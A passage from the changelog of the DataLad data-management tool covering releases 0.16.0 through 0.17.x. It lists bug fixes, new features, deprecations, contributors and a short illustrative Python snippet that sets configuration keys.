([@yarikoptic](https://github.com/yarikoptic))\n- BF: travis - mark our directory as safe to interact with as root [#6919](https://github.com/datalad/datalad/pull/6919) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: do not pretend we know what repo version git-annex would upgrade to [#6902](https://github.com/datalad/datalad/pull/6902) ([@yarikoptic](https://github.com/yarikoptic))\n- BF(TST): do not expect log message for guessing Path to be possibly a URL on windows [#6911](https://github.com/datalad/datalad/pull/6911) ([@yarikoptic](https://github.com/yarikoptic))\n- ENH(TST): Disable coverage 
reporting on travis while running pytest [#6898](https://github.com/datalad/datalad/pull/6898) ([@yarikoptic](https://github.com/yarikoptic))\n- RF: just rename internal variable from unclear \"op\" to \"io\" [#6907](https://github.com/datalad/datalad/pull/6907) ([@yarikoptic](https://github.com/yarikoptic))\n- DX: Demote loglevel of message on url parameters to DEBUG while guessing RI [#6891](https://github.com/datalad/datalad/pull/6891) ([@adswa](https://github.com/adswa) [@yarikoptic](https://github.com/yarikoptic))\n- Fix and expand datalad.runner type annotations [#6893](https://github.com/datalad/datalad/pull/6893) ([@christian-monch](https://github.com/christian-monch) [@yarikoptic](https://github.com/yarikoptic))\n- Use pytest to test datalad-metalad in test_extensions-workflow [#6892](https://github.com/datalad/datalad/pull/6892) ([@christian-monch](https://github.com/christian-monch))\n- Let push honor multiple publication dependencies declared via siblings [#6869](https://github.com/datalad/datalad/pull/6869) ([@mih](https://github.com/mih) [@yarikoptic](https://github.com/yarikoptic))\n- ENH: upgrade versioneer from versioneer-0.20.dev0 to versioneer-0.23.dev0 [#6888](https://github.com/datalad/datalad/pull/6888) ([@yarikoptic](https://github.com/yarikoptic))\n- ENH: introduce typing checking and GitHub workflow [#6885](https://github.com/datalad/datalad/pull/6885) ([@yarikoptic](https://github.com/yarikoptic))\n- RF,ENH(TST): future proof testing of git annex version upgrade + test annex init on all supported versions [#6880](https://github.com/datalad/datalad/pull/6880) ([@yarikoptic](https://github.com/yarikoptic))\n- ENH(TST): test against supported git annex repo version 10 + make it a full sweep over tests [#6881](https://github.com/datalad/datalad/pull/6881) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: RF f-string uses in logger to %-interpolations [#6886](https://github.com/datalad/datalad/pull/6886) ([@yarikoptic](https://github.com/yarikoptic))\n- Merge branch 'bf-sphinx-5.1.0' into maint [#6883](https://github.com/datalad/datalad/pull/6883) ([@yarikoptic](https://github.com/yarikoptic))\n- BF(DOC): workaround for #10701 of sphinx in 5.1.0 [#6883](https://github.com/datalad/datalad/pull/6883) ([@yarikoptic](https://github.com/yarikoptic))\n- Clarify confusing INFO log message from get() on dataset installation [#6871](https://github.com/datalad/datalad/pull/6871) ([@mih](https://github.com/mih))\n- Protect again failing to load a command interface from an extension [#6879](https://github.com/datalad/datalad/pull/6879) ([@mih](https://github.com/mih))\n- Support unsetting config via `datalad -c :<name>` [#6864](https://github.com/datalad/datalad/pull/6864) ([@mih](https://github.com/mih))\n- Fix DOC string typo in the path within AnnexRepo.annexstatus, and replace with proper sphinx reference [#6858](https://github.com/datalad/datalad/pull/6858) ([@christian-monch](https://github.com/christian-monch))\n- Improved support for saving typechanges [#6793](https://github.com/datalad/datalad/pull/6793) ([@mih](https://github.com/mih))\n\n#### ⚠️ Pushed to `maint`\n\n- BF: Remove duplicate ds key from result record ([@adswa](https://github.com/adswa))\n- DOC: fix capitalization of service names ([@aqw](https://github.com/aqw))\n\n#### 🧪 Tests\n\n- BF(TST,workaround): just xfail failing archives test on NFS [#6912](https://github.com/datalad/datalad/pull/6912) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### Authors: 5\n\n- Adina Wagner 
([@adswa](https://github.com/adswa))\n- Alex Waite ([@aqw](https://github.com/aqw))\n- Christian Mönch ([@christian-monch](https://github.com/christian-monch))\n- Michael Hanke ([@mih](https://github.com/mih))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.17.2 (Sat Jul 16 2022)\n\n#### 🐛 Bug Fix\n\n- BF(TST): do proceed to proper test for error being caught for recent git-annex on windows with symlinks [#6850](https://github.com/datalad/datalad/pull/6850) ([@yarikoptic](https://github.com/yarikoptic))\n- Addressing problem testing against python 3.10 on Travis (skip more annex versions) [#6842](https://github.com/datalad/datalad/pull/6842) ([@yarikoptic](https://github.com/yarikoptic))\n- XFAIL test_runner_parametrized_protocol on python3.8 when getting duplicate output [#6837](https://github.com/datalad/datalad/pull/6837) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: Make create's check for procedures work with several again [#6841](https://github.com/datalad/datalad/pull/6841) ([@adswa](https://github.com/adswa))\n- Support older pytests [#6836](https://github.com/datalad/datalad/pull/6836) ([@jwodder](https://github.com/jwodder))\n\n#### Authors: 3\n\n- Adina Wagner ([@adswa](https://github.com/adswa))\n- John T. Wodder II ([@jwodder](https://github.com/jwodder))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.17.1 (Mon Jul 11 2022)\n\n#### 🐛 Bug Fix\n\n- DOC: minor fix - consistent DataLad (not Datalad) in docs and CHANGELOG [#6830](https://github.com/datalad/datalad/pull/6830) ([@yarikoptic](https://github.com/yarikoptic))\n- DOC: fixup/harmonize Changelog for 0.17.0 a little [#6828](https://github.com/datalad/datalad/pull/6828) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: use --python-match minor option in new datalad-installer release to match outside version of Python [#6827](https://github.com/datalad/datalad/pull/6827) ([@christian-monch](https://github.com/christian-monch) [@yarikoptic](https://github.com/yarikoptic))\n- Do not quote paths for ssh >= 9 [#6826](https://github.com/datalad/datalad/pull/6826) ([@christian-monch](https://github.com/christian-monch) [@yarikoptic](https://github.com/yarikoptic))\n- Suppress DeprecationWarning to allow for distutils to be used [#6819](https://github.com/datalad/datalad/pull/6819) ([@yarikoptic](https://github.com/yarikoptic))\n- RM(TST): remove testing of datalad.test which was removed from 0.17.0 [#6822](https://github.com/datalad/datalad/pull/6822) ([@yarikoptic](https://github.com/yarikoptic))\n- Avoid import of nose-based tests.utils, make skip_if_no_module() and skip_if_no_network() allowed at module level [#6817](https://github.com/datalad/datalad/pull/6817) ([@jwodder](https://github.com/jwodder))\n- BF(TST): use higher level asyncio.run instead of asyncio.get_event_loop in test_inside_async [#6808](https://github.com/datalad/datalad/pull/6808) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### Authors: 3\n\n- Christian Mönch ([@christian-monch](https://github.com/christian-monch))\n- John T. Wodder II ([@jwodder](https://github.com/jwodder))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.17.0 (Thu Jul 7 2022) -- pytest migration\n\n#### 💫 Enhancements and new features\n- \"log\" progress bar now reports about starting a specific action as well. 
[#6756](https://github.com/datalad/datalad/pull/6756) (by @yarikoptic)\n- Documentation and behavior of traceback reporting for log messages via `DATALAD_LOG_TRACEBACK` was improved to yield a more compact report. The documentation for this feature has been clarified. [#6746](https://github.com/datalad/datalad/pull/6746) (by @mih)\n- `datalad unlock` gained a progress bar. [#6704](https://github.com/datalad/datalad/pull/6704) (by @adswa)\n- When `create-sibling-gitlab` is called on non-existing subdatasets or paths it now returns an impossible result instead of no feedback at all. [#6701](https://github.com/datalad/datalad/pull/6701) (by @adswa)\n- `datalad wtf` includes a report on file system types of commonly used paths. [#6664](https://github.com/datalad/datalad/pull/6664) (by @adswa)\n- Use next generation metadata code in search, if it is available. [#6518](https://github.com/datalad/datalad/pull/6518) (by @christian-monch)\n\n#### 🪓 Deprecations and removals\n- Remove unused and untested log helpers `NoProgressLog` and `OnlyProgressLog`. [#6747](https://github.com/datalad/datalad/pull/6747) (by @mih)\n- Remove unused `sorted_files()` helper. [#6722](https://github.com/datalad/datalad/pull/6722) (by @adswa)\n- Discontinued the value `stdout` for use with the config variable `datalad.log.target` as its use would inevitably break special remote implementations. [#6675](https://github.com/datalad/datalad/pull/6675) (by @bpoldrack)\n- `AnnexRepo.add_urls()` is deprecated in favor of `AnnexRepo.add_url_to_file()` or a direct call to `AnnexRepo.call_annex()`. [#6667](https://github.com/datalad/datalad/pull/6667) (by @mih)\n- `datalad test` command and supporting functionality (e.g., `datalad.test`) were removed. [#6273](https://github.com/datalad/datalad/pull/6273) (by @jwodder)\n\n#### 🐛 Bug Fixes\n- `export-archive` does not rely on `normalize_path()` methods anymore and became more robust when called from subdirectories. [#6745](https://github.com/datalad/datalad/pull/6745) (by @adswa)\n- Sanitize keys before checking content availability to ensure that the content availability of files with URL- or custom backend keys is correctly determined and marked. [#6663](https://github.com/datalad/datalad/pull/6663) (by @adswa)\n- Ensure saving a new subdataset to a superdataset yields a valid `.gitmodules` record regardless of whether and how a path constraint is given to the `save()` call. Fixes #6547 [#6790](https://github.com/datalad/datalad/pull/6790) (by @mih)\n- `save` now repairs annex symlinks broken by a `git-mv` operation prior recording a new dataset state. Fixes #4967 [#6795](https://github.com/datalad/datalad/pull/6795) (by @mih)\n\n#### 📝 Documentation\n- API documentation for log helpers, like `log_progress()` is now included in the renderer documentation. [#6746](https://github.com/datalad/datalad/pull/6746) (by @mih)\n- New design document on progress reporting. [#6734](https://github.com/datalad/datalad/pull/6734) (by @mih)\n- Explain downstream consequences of using `--fast` option in `addurls`. [#6684](https://github.com/datalad/datalad/pull/6684) (by @jdkent)\n\n#### 🏠 Internal\n- Inline code of `create-sibling-ria` has been refactored to an internal helper to check for siblings with particular names across dataset hierarchies in `datalad-next`, and is reintroduced into core to modularize the code base further. [#6706](https://github.com/datalad/datalad/pull/6706) (by @adswa)\n- `get_initialized_logger` now lets a given `logtarget` take precedence over `datalad.log.target`. 
[#6675](https://github.com/datalad/datalad/pull/6675) (by @bpoldrack)\n- Many uses of deprecated call options were replaced with the recommended ones. [#6273](https://github.com/datalad/datalad/pull/6273) (by @jwodder)\n- Get rid of `asyncio` import by defining few noops methods from `asyncio.protocols.SubprocessProtocol` directly in `WitlessProtocol`. [#6648](https://github.com/datalad/datalad/pull/6648) (by @yarikoptic)\n- Consolidate `GitRepo.remove()` and `AnnexRepo.remove()` into a single implementation. [#6783](https://github.com/datalad/datalad/pull/6783) (by @mih)\n#### 🛡 Tests\n- Discontinue use of `with_testrepos` decorator other than for the deprecation cycle for `nose`. [#6690](https://github.com/datalad/datalad/pull/6690) (by @mih @bpoldrack) See [#6144](https://github.com/datalad/datalad/issues/6144) for full list of changes.\n- Remove usage of deprecated `AnnexRepo.add_urls` in tests. [#6683](https://github.com/datalad/datalad/pull/6683) (by @bpoldrack)\n- Minimalistic (adapters, no assert changes, etc) migration from `nose` to `pytest`.\n Support functionality possibly used by extensions and relying on `nose` helpers is left in place to avoid affecting their run time and defer migration of their test setups.. [#6273](https://github.com/datalad/datalad/pull/6273) (by @jwodder)\n\n#### Authors: 7\n\n- Yaroslav Halchenko (@yarikoptic)\n- Michael Hanke (@mih)\n- Benjamin Poldrack (@bpoldrack)\n- Adina Wagner (@adswa)\n- John T. Wodder (@jwodder)\n- Christian Mönch (@christian-monch)\n- James Kent (@jdkent)\n\n# 0.16.7 (Wed Jul 06 2022)\n\n#### 🐛 Bug Fix\n\n- Fix broken annex symlink after git-mv before saving + fix a race condition in ssh copy test [#6809](https://github.com/datalad/datalad/pull/6809) ([@christian-monch](https://github.com/christian-monch) [@mih](https://github.com/mih) [@yarikoptic](https://github.com/yarikoptic))\n- Do not ignore already known status info on submodules [#6790](https://github.com/datalad/datalad/pull/6790) ([@mih](https://github.com/mih))\n- Fix \"common data source\" test to use a valid URL (maint-based & extended edition) [#6788](https://github.com/datalad/datalad/pull/6788) ([@mih](https://github.com/mih) [@yarikoptic](https://github.com/yarikoptic))\n- Upload coverage from extension tests to Codecov [#6781](https://github.com/datalad/datalad/pull/6781) ([@jwodder](https://github.com/jwodder))\n- Clean up line end handling in GitRepo [#6768](https://github.com/datalad/datalad/pull/6768) ([@christian-monch](https://github.com/christian-monch))\n- Do not skip file-URL tests on windows [#6772](https://github.com/datalad/datalad/pull/6772) ([@christian-monch](https://github.com/christian-monch))\n- Fix test errors caused by updated chardet v5 release [#6777](https://github.com/datalad/datalad/pull/6777) ([@christian-monch](https://github.com/christian-monch))\n- Preserve final trailing slash in ``call_git()`` output [#6754](https://github.com/datalad/datalad/pull/6754) ([@adswa](https://github.com/adswa) [@yarikoptic](https://github.com/yarikoptic) [@christian-monch](https://github.com/christian-monch))\n\n#### ⚠️ Pushed to `maint`\n\n- Make sure a subdataset is saved with a complete .gitmodules record ([@mih](https://github.com/mih))\n\n#### Authors: 5\n\n- Adina Wagner ([@adswa](https://github.com/adswa))\n- Christian Mönch ([@christian-monch](https://github.com/christian-monch))\n- John T. 
Wodder II ([@jwodder](https://github.com/jwodder))\n- Michael Hanke ([@mih](https://github.com/mih))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.16.6 (Tue Jun 14 2022)\n\n#### 🐛 Bug Fix\n\n- Prevent duplicated result rendering when searching in default datasets [#6765](https://github.com/datalad/datalad/pull/6765) ([@christian-monch](https://github.com/christian-monch))\n- BF(workaround): skip test_ria_postclonecfg on OSX for now ([@yarikoptic](https://github.com/yarikoptic))\n- BF(workaround to #6759): if saving credential failed, just log error and continue [#6762](https://github.com/datalad/datalad/pull/6762) ([@yarikoptic](https://github.com/yarikoptic))\n- Prevent reentry of a runner instance [#6737](https://github.com/datalad/datalad/pull/6737) ([@christian-monch](https://github.com/christian-monch))\n\n#### Authors: 2\n\n- Christian Mönch ([@christian-monch](https://github.com/christian-monch))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.16.5 (Wed Jun 08 2022)\n\n#### 🐛 Bug Fix\n\n- BF: push to github - remove datalad-push-default-first config only in non-dry run to ensure we push default branch separately in next step [#6750](https://github.com/datalad/datalad/pull/6750) ([@yarikoptic](https://github.com/yarikoptic))\n- In addition to default (system) ssh version, report configured ssh; fix ssh version parsing on Windows [#6729](https://github.com/datalad/datalad/pull/6729) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### Authors: 1\n\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.16.4 (Thu Jun 02 2022)\n\n#### 🐛 Bug Fix\n\n- BF(TST): RO operations - add test directory into git safe.directory [#6726](https://github.com/datalad/datalad/pull/6726) ([@yarikoptic](https://github.com/yarikoptic))\n- DOC: fixup of docstring for skip_ssh [#6727](https://github.com/datalad/datalad/pull/6727) ([@yarikoptic](https://github.com/yarikoptic))\n- DOC: Set language in Sphinx config to en [#6727](https://github.com/datalad/datalad/pull/6727) ([@adswa](https://github.com/adswa))\n- BF: Catch KeyErrors from unavailable WTF infos [#6712](https://github.com/datalad/datalad/pull/6712) ([@adswa](https://github.com/adswa))\n- Add annex.private to ephemeral clones. That would make git-annex not assign shared (in git-annex branch) annex uuid. 
[#6702](https://github.com/datalad/datalad/pull/6702) ([@bpoldrack](https://github.com/bpoldrack) [@adswa](https://github.com/adswa))\n- BF: require argcomplete version at least 1.12.3 to test/operate correctly [#6693](https://github.com/datalad/datalad/pull/6693) ([@yarikoptic](https://github.com/yarikoptic))\n- Replace Zenodo DOI with JOSS for due credit [#6725](https://github.com/datalad/datalad/pull/6725) ([@adswa](https://github.com/adswa))\n\n#### Authors: 3\n\n- Adina Wagner ([@adswa](https://github.com/adswa))\n- Benjamin Poldrack ([@bpoldrack](https://github.com/bpoldrack))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.16.3 (Thu May 12 2022)\n\n#### 🐛 Bug Fix\n\n- No change for a PR to trigger release [#6692](https://github.com/datalad/datalad/pull/6692) ([@yarikoptic](https://github.com/yarikoptic))\n- Sanitize keys before checking content availability to ensure correct value for keys with URL or custom backend [#6665](https://github.com/datalad/datalad/pull/6665) ([@adswa](https://github.com/adswa) [@yarikoptic](https://github.com/yarikoptic))\n- Change a key-value pair in drop result record [#6625](https://github.com/datalad/datalad/pull/6625) ([@mslw](https://github.com/mslw))\n- Link docs of datalad-next [#6677](https://github.com/datalad/datalad/pull/6677) ([@mih](https://github.com/mih))\n- Fix `GitRepo.get_branch_commits_()` to handle branch names conflicts with paths [#6661](https://github.com/datalad/datalad/pull/6661) ([@mih](https://github.com/mih))\n- OPT: AnnexJsonProtocol - avoid dragging possibly long data around [#6660](https://github.com/datalad/datalad/pull/6660) ([@yarikoptic](https://github.com/yarikoptic))\n- Remove two too prominent create() INFO log message that duplicate DEBUG log and harmonize some other log messages [#6638](https://github.com/datalad/datalad/pull/6638) ([@mih](https://github.com/mih) [@yarikoptic](https://github.com/yarikoptic))\n- Remove unsupported parameter create_sibling_ria(existing=None) [#6637](https://github.com/datalad/datalad/pull/6637) ([@mih](https://github.com/mih))\n- Add released plugin to .autorc to annotate PRs on when released [#6639](https://github.com/datalad/datalad/pull/6639) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### Authors: 4\n\n- Adina Wagner ([@adswa](https://github.com/adswa))\n- Michael Hanke ([@mih](https://github.com/mih))\n- Michał Szczepanik ([@mslw](https://github.com/mslw))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.16.2 (Thu Apr 21 2022)\n\n#### 🐛 Bug Fix\n\n- Demote (to level 1 from DEBUG) and speed-up API doc logging (parseParameters) [#6635](https://github.com/datalad/datalad/pull/6635) ([@mih](https://github.com/mih))\n- Factor out actual data transfer in push [#6618](https://github.com/datalad/datalad/pull/6618) ([@christian-monch](https://github.com/christian-monch))\n- ENH: include version of datalad in tests teardown Versions: report [#6628](https://github.com/datalad/datalad/pull/6628) ([@yarikoptic](https://github.com/yarikoptic))\n- MNT: Require importlib-metadata >=3.6 for Python < 3.10 for entry_points taking kwargs [#6631](https://github.com/datalad/datalad/pull/6631) ([@effigies](https://github.com/effigies))\n- Factor out credential handling of create-sibling-ghlike [#6627](https://github.com/datalad/datalad/pull/6627) ([@mih](https://github.com/mih))\n- BF: Fix wrong key name of annex' JSON records [#6624](https://github.com/datalad/datalad/pull/6624) 
([@bpoldrack](https://github.com/bpoldrack))\n\n#### ⚠️ Pushed to `maint`\n\n- Fix typo in changelog ([@mih](https://github.com/mih))\n- [ci skip] minor typo fix ([@yarikoptic](https://github.com/yarikoptic))\n\n#### Authors: 5\n\n- Benjamin Poldrack ([@bpoldrack](https://github.com/bpoldrack))\n- Chris Markiewicz ([@effigies](https://github.com/effigies))\n- Christian Mönch ([@christian-monch](https://github.com/christian-monch))\n- Michael Hanke ([@mih](https://github.com/mih))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.16.1 (Fr Apr 8 2022) -- April Fools' Release\n\n- Fixes forgotten changelog in docs\n\n# 0.16.0 (Fr Apr 8 2022) -- Spring cleaning!\n\n#### 💫 Enhancements and new features\n\n- A new set of ``create-sibling-*`` commands reimplements the GitHub-platform support of ``create-sibling-github`` and adds support to interface three new platforms in a unified fashion: GIN (``create-sibling-gin``), GOGS (``create-sibling-gogs``), and Gitea (``create-sibling-gitea``). All commands rely on personal access tokens only for authentication, allow for specifying one of several stored credentials via a uniform ``--credential`` parameter, and support a uniform ``--dry-run`` mode for testing without network. [#5949](https://github.com/datalad/datalad/pull/5949) (by @mih)\n- ``create-sibling-github`` now has supports direct specification of organization repositories via a ``[<org>/]repo``syntax [#5949](https://github.com/datalad/datalad/pull/5949) (by @mih)\n- ``create-sibling-gitlab`` gained a ``--dry-run`` parameter to match the corresponding parameters in ``create-sibling-{github,gin,gogs,gitea}`` [#6013](https://github.com/datalad/datalad/pull/6013) (by @adswa)\n- The ``--new-store-ok`` parameter of ``create-sibling-ria`` only creates new RIA stores when explicitly provided [#6045](https://github.com/datalad/datalad/pull/6045) (by @adswa)\n- The default performance of ``status()`` and ``diff()`` commands is improved by up to 700% removing file-type evaluation as a default operation, and simplifying the type reporting rule [#6097](https://github.com/datalad/datalad/pull/6097) (by @mih)\n- ``drop()`` and ``remove()`` were reimplemented in full, conceptualized as the antagonist commands to ``get()`` and ``clone()``. A new, harmonized set of parameters (``--what ['filecontent', 'allkeys', 'datasets', 'all']``, ``--reckless ['modification', 'availability', 'undead', 'kill']``) simplifies their API. Both commands include additional safeguards. ``uninstall`` is replaced with a thin shim command around ``drop()`` [#6111](https://github.com/datalad/datalad/pull/6111) (by @mih)\n- ``add_archive_content()`` was refactored into a dataset method and gained progress bars [#6105](https://github.com/datalad/datalad/pull/6105) (by @adswa)\n- The ``datalad`` and ``datalad-archives`` special remotes have been reimplemented based on ``AnnexRemote`` [#6165](https://github.com/datalad/datalad/pull/6165) (by @mih)\n- The ``result_renderer()`` semantics were decomplexified and harmonized. The previous ``default`` result renderer was renamed to ``generic``. 
[#6174](https://github.com/datalad/datalad/pull/6174) (by @mih)\n- ``get_status_dict`` learned to include exit codes in the case of CommandErrors [#5642](https://github.com/datalad/datalad/pull/5642) (by @yarikoptic)\n- ``datalad clone`` can now pass options to ``git-clone``, adding support for cloning specific tags or branches, naming siblings other names than ``origin``, and exposing ``git clone``'s optimization arguments [#6218](https://github.com/datalad/datalad/pull/6218) (by @kyleam and @mih)\n- Inactive BatchedCommands are cleaned up [#6206](https://github.com/datalad/datalad/pull/6206) (by @jwodder)\n- ``export-archive-ora`` learned to filter files exported to 7z archives [#6234](https://github.com/datalad/datalad/pull/6234) (by @mih and @bpinsard)\n- ``datalad run`` learned to glob recursively [#6262](https://github.com/datalad/datalad/pull/6262) (by @AKSoo)\n- The ORA remote learned to recover from interrupted uploads [#6267](https://github.com/datalad/datalad/pull/6267) (by @mih)\n- A new threaded runner with support for timeouts and generator-based subprocess communication is introduced and used in ``BatchedCommand`` and ``AnnexRepo`` [#6244](https://github.com/datalad/datalad/pull/6244) (by @christian-monch)\n- A new switch allows to enable librarymode and queries for the effective API in use [#6213](https://github.com/datalad/datalad/pull/6213) (by @mih)\n- ``run`` and ``rerun`` now support parallel jobs via ``--jobs`` [#6279](https://github.com/datalad/datalad/pull/6279) (by @AKSoo)\n- A new ``foreach-dataset`` plumbing command allows to run commands on each (sub)dataset, similar to ``git submodule foreach``\n[#5517](https://github.com/datalad/datalad/pull/5517) (by @yarikoptic)\n- The ``dataset`` parameter is not restricted to only locally resolvable file-URLs anymore [#6276](https://github.com/datalad/datalad/pull/6276) (by @christian-monch)\n- DataLad's credential system is now able to query `git-credential` by specifying credential type `git` in the respective provider configuration [#5796](https://github.com/datalad/datalad/pull/5796) (by @bpoldrack)\n- DataLad now comes with a git credential helper `git-credential-datalad` allowing Git to query DataLad's credential system [#5796](https://github.com/datalad/datalad/pull/5796) (by @bpoldrack and @mih)\n- The new runner now allows for multiple threads [#6371](https://github.com/datalad/datalad/pull/6371) (by @christian-monch)\n- A new configurationcommand provides an interface to manipulate and query the DataLad configuration. [#6306](https://github.com/datalad/datalad/pull/6306) (by @mih)\n - Unlike the global Python-only datalad.cfg or dataset-specific Dataset.config configuration managers, this command offers a uniform API across the Python and the command line interfaces.\n - This command was previously available in the mihextras extension as x-configuration, and has been merged into the core package in an improved version. [#5489](https://github.com/datalad/datalad/pull/5489) (by @mih)\n - In its default dump mode, the command provides an annotated list of the effective configuration after considering all configuration sources, including hints on additional configuration settings and their supported values.\n- The command line interface help-reporting has been sped up by ~20% [#6370](https://github.com/datalad/datalad/pull/6370) [#6378](https://github.com/datalad/datalad/pull/6378) (by @mih)\n- ``ConfigManager`` now supports reading committed dataset configuration in bare repositories. 
Analogous to reading ``.datalad/config`` from a worktree, ``blob:HEAD:.datalad/config`` is read (e.g., the config committed in the default branch). The support includes ``reload()`` change detection using the gitsha of this file. The behavior for non-bare repositories is unchanged. [#6332](https://github.com/datalad/datalad/pull/6332) (by @mih)\n- The CLI help generation has been sped up, and now also supports the completion of parameter values for a fixed set of choices [#6415](https://github.com/datalad/datalad/pull/6415) (by @mih)\n- Individual command implementations can now declare a specific \"on-failure\" behavior by defining `Interface.on_failure` to be one of the supported modes (stop, continue, ignore). Previously, such a modification was only possible on a per-call basis. [#6430](https://github.com/datalad/datalad/pull/6430) (by @mih)\n- The `run` command changed its default \"on-failure\" behavior from `continue` to `stop`. This change prevents the execution of a command in case a declared input cannot be obtained. Previously, only an error result was yielded (and run eventually yielded a non-zero exit code or an `IncompleteResultsError`), but the execution proceeded and potentially saved a dataset modification despite incomplete inputs, in case the command succeeded. This previous default behavior can still be achieved by calling run with the equivalent of `--on-failure continue` [#6430](https://github.com/datalad/datalad/pull/6430) (by @mih)\n- The ``run`` command now provides readily executable, API-specific instructions on how to save the results of a command execution that failed expectedly [#6434](https://github.com/datalad/datalad/pull/6434) (by @mih)\n- `create-sibling --since=^` mode will now be as fast as `push --since=^` to figure out for which subdatasets to create siblings [#6436](https://github.com/datalad/datalad/pull/6436) (by @yarikoptic)\n- When file names contain illegal characters or reserved file names that are incompatible with Windows systems, a configurable check for ``save`` (``datalad.save.windows-compat-warning``) will either do nothing (`none`), emit an incompatibility warning (`warning`, default), or cause ``save`` to error (`error`) [#6291](https://github.com/datalad/datalad/pull/6291) (by @adswa)\n- Improve responsiveness of `datalad drop` in datasets with a large annex. [#6580](https://github.com/datalad/datalad/pull/6580) (by @christian-monch)\n- `save` code might operate faster on heavy file trees [#6581](https://github.com/datalad/datalad/pull/6581) (by @yarikoptic)\n- Removed a per-file overhead cost for ORA when downloading over HTTP [#6609](https://github.com/datalad/datalad/pull/6609) (by @bpoldrack)\n- A new module `datalad.support.extensions` offers the utility functions `register_config()` and `has_config()` that allow extension developers to announce additional configuration items to the central configuration management. [#6601](https://github.com/datalad/datalad/pull/6601) (by @mih)\n- When operating in a dirty dataset, `export-to-figshare` now yields an impossible result instead of raising a RuntimeError [#6543](https://github.com/datalad/datalad/pull/6543) (by @adswa)\n- Loading DataLad extension packages has been sped up, leading to between 2x and 4x faster run times for loading individual extensions and reporting help output across all installed extensions. [#6591](https://github.com/datalad/datalad/pull/6591) (by @mih)\n- Introduces the configuration key `datalad.ssh.executable`.
This key allows specifying an ssh-client executable that should be used by DataLad to establish SSH connections. The default value is `ssh` unless on a Windows system where `$WINDIR\\System32\\OpenSSH\\ssh.exe` exists. In this case, the value defaults to `$WINDIR\\System32\\OpenSSH\\ssh.exe` (see the illustrative configuration snippet after this list). [#6553](https://github.com/datalad/datalad/pull/6553) (by @christian-monch)\n- create-sibling should perform much faster in case of a `--since` specification, since it would consider only submodules related to the changes since that point. [#6528](https://github.com/datalad/datalad/pull/6528) (by @yarikoptic)\n- A new configuration setting `datalad.ssh.try-use-annex-bundled-git=yes|no` can be used to influence the default remote git-annex bundle sensing for SSH connections. This was previously done unconditionally for any call to `datalad sshrun` (which is also used for any SSH-related Git or git-annex functionality triggered by DataLad-internal processing) and could incur a substantial per-call runtime cost. The new default is to not perform this sensing, because for, e.g., use as GIT_SSH_COMMAND there is no expectation to have a remote git-annex installation, and even with an existing git-annex/Git bundle on the remote, it is not certain that the bundled Git version is to be preferred over any other Git installation in a user's PATH. [#6533](https://github.com/datalad/datalad/pull/6533) (by @mih)\n- `run` now yields a result record immediately after executing a command. This allows callers to use the standard `--on-failure` switch to control whether dataset modifications will be saved for a command that exited with an error. [#6447](https://github.com/datalad/datalad/pull/6447) (by @mih)
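\n\nPurely as an illustration (not part of the release notes above), the following minimal sketch shows how a few of the configuration-related additions from this list could be exercised via DataLad's Python API; the dataset path, the chosen scopes, and the chosen values are assumptions made for the example.\n\n```python\n# Illustrative sketch only: assumes the current directory is a DataLad dataset\n# and that writing to the selected configuration scopes is acceptable.\nfrom datalad.api import Dataset\n\nds = Dataset('.')\n\n# datalad.save.windows-compat-warning: 'none', 'warning' (default), or 'error'\nds.config.set('datalad.save.windows-compat-warning', 'error', scope='local')\n\n# datalad.ssh.executable: point DataLad at a specific ssh client\nds.config.set('datalad.ssh.executable', '/usr/bin/ssh', scope='global')\n\nprint(ds.config.get('datalad.save.windows-compat-warning'))\n```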
\n\n#### 🪓 Deprecations and removals\n\n- The ``--pbs-runner`` commandline option (deprecated in ``0.15.0``) was removed [#5981](https://github.com/datalad/datalad/pull/5981) (by @mih)\n- The dependency on PyGithub was dropped [#5949](https://github.com/datalad/datalad/pull/5949) (by @mih)\n- ``create-sibling-github``'s credential handling was trimmed down to only allow personal access tokens, because GitHub discontinued user/password based authentication [#5949](https://github.com/datalad/datalad/pull/5949) (by @mih)\n- ``create-sibling-gitlab``'s ``--dryrun`` parameter is deprecated in favor of ``--dry-run`` [#6013](https://github.com/datalad/datalad/pull/6013) (by @adswa)\n- Internal obsolete ``GitRepo.*_submodule`` methods were moved to ``datalad-deprecated`` [#6010](https://github.com/datalad/datalad/pull/6010) (by @mih)\n- ``datalad/support/versions.py`` is unused in DataLad core and removed [#6115](https://github.com/datalad/datalad/pull/6115) (by @yarikoptic)\n- Support for the undocumented ``datalad.api.result-renderer`` config setting has been dropped [#6174](https://github.com/datalad/datalad/pull/6174) (by @mih)\n- Undocumented use of ``result_renderer=None`` is replaced with ``result_renderer='disabled'`` [#6174](https://github.com/datalad/datalad/pull/6174) (by @mih)\n- ``remove``'s ``--recursive`` argument has been deprecated [#6257](https://github.com/datalad/datalad/pull/6257) (by @mih)\n- The use of the internal helper ``get_repo_instance()`` is discontinued and deprecated [#6268](https://github.com/datalad/datalad/pull/6268) (by @mih)\n- Support for Python 3.6 has been dropped ([#6286](https://github.com/datalad/datalad/pull/6286) (by @christian-monch) and [#6364](https://github.com/datalad/datalad/pull/6364) (by @yarikoptic))\n- All but one Singularity recipe flavor have been removed due to their limited value with the end of life of Singularity Hub [#6303](https://github.com/datalad/datalad/pull/6303) (by @mih)\n- All code in the module datalad.cmdline was (re)moved, only datalad.cmdline.helpers.get_repo_instance is kept for a deprecation period (by 